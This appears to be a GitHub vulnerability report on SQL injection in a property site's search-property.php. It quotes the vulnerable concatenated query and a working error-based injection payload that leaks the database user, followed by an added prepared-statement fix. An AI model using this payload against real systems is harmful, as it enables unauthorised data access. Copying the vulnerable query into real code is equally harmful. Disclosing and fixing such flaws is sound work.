SQL injection vulnerability exists in search-property.php #7

Closed
@huclilu

Build environment: Apache 2.4.39; MySQL 5.7.26; PHP 7.3.4

SQL injection vulnerability exists in search-property.php

In search-property.php, in lines 52-54 of the code, search_property is transferred to the backend through the POST request and assigned to the variable $q_string, and then it is substituted into the database for fuzzy query, and then the mysqli_query function is used to return the result of the data query

$q_string = $_POST['search_property'];
$sql="SELECT * FROM add_property where concat(zone,district,province,city,tole,property_type,country) like '%$q_string%'";
    $query=mysqli_query($db,$sql);

POC:

123' or (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- ace

SQL injection to obtain the current user
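
An added example, not part of the original report or the project's code: one way to rewrite the query from lines 52-54 with a mysqli prepared statement so that search_property is bound as data instead of concatenated into the SQL text. The function name `search_properties` is hypothetical, and `$db` is assumed to be the same open mysqli connection the original code passes to mysqli_query.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical replacement for the concatenated query in search-property.php.
 * Assumes $db is the open mysqli connection the page's code already uses.
 *
 * Intended call site (replacing lines 52-54):
 *   $q_string = $_POST['search_property'] ?? '';
 *   $rows = search_properties($db, is_string($q_string) ? $q_string : '');
 */
function search_properties(mysqli $db, string $term): array
{
    // Escape LIKE metacharacters so a user-supplied % or _ matches literally.
    // Backslash is MySQL's default LIKE escape character.
    $pattern = '%' . addcslashes($term, '\\%_') . '%';

    // The SQL text is constant; the search term is sent only as a bound parameter.
    $sql = "SELECT * FROM add_property
            WHERE CONCAT(zone, district, province, city, tole, property_type, country) LIKE ?";

    // The false-return checks below match the default mysqli reporting mode of
    // PHP 7.3 (the report's environment); PHP 8.1+ throws mysqli_sql_exception by default.
    $stmt = mysqli_prepare($db, $sql);
    if ($stmt === false) {
        // Log server-side only; database errors are not echoed to the client.
        error_log('search_properties: prepare failed: ' . mysqli_error($db));
        return [];
    }

    mysqli_stmt_bind_param($stmt, 's', $pattern);
    if (!mysqli_stmt_execute($stmt)) {
        error_log('search_properties: execute failed: ' . mysqli_stmt_error($stmt));
        mysqli_stmt_close($stmt);
        return [];
    }

    // mysqli_stmt_get_result() requires the mysqlnd driver.
    $result = mysqli_stmt_get_result($stmt);
    $rows = ($result !== false) ? mysqli_fetch_all($result, MYSQLI_ASSOC) : [];
    mysqli_stmt_close($stmt);

    return $rows;
}
```

With the term bound this way, the quote character in the POC above is matched as literal text inside the LIKE pattern and cannot close the string in the SQL statement.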
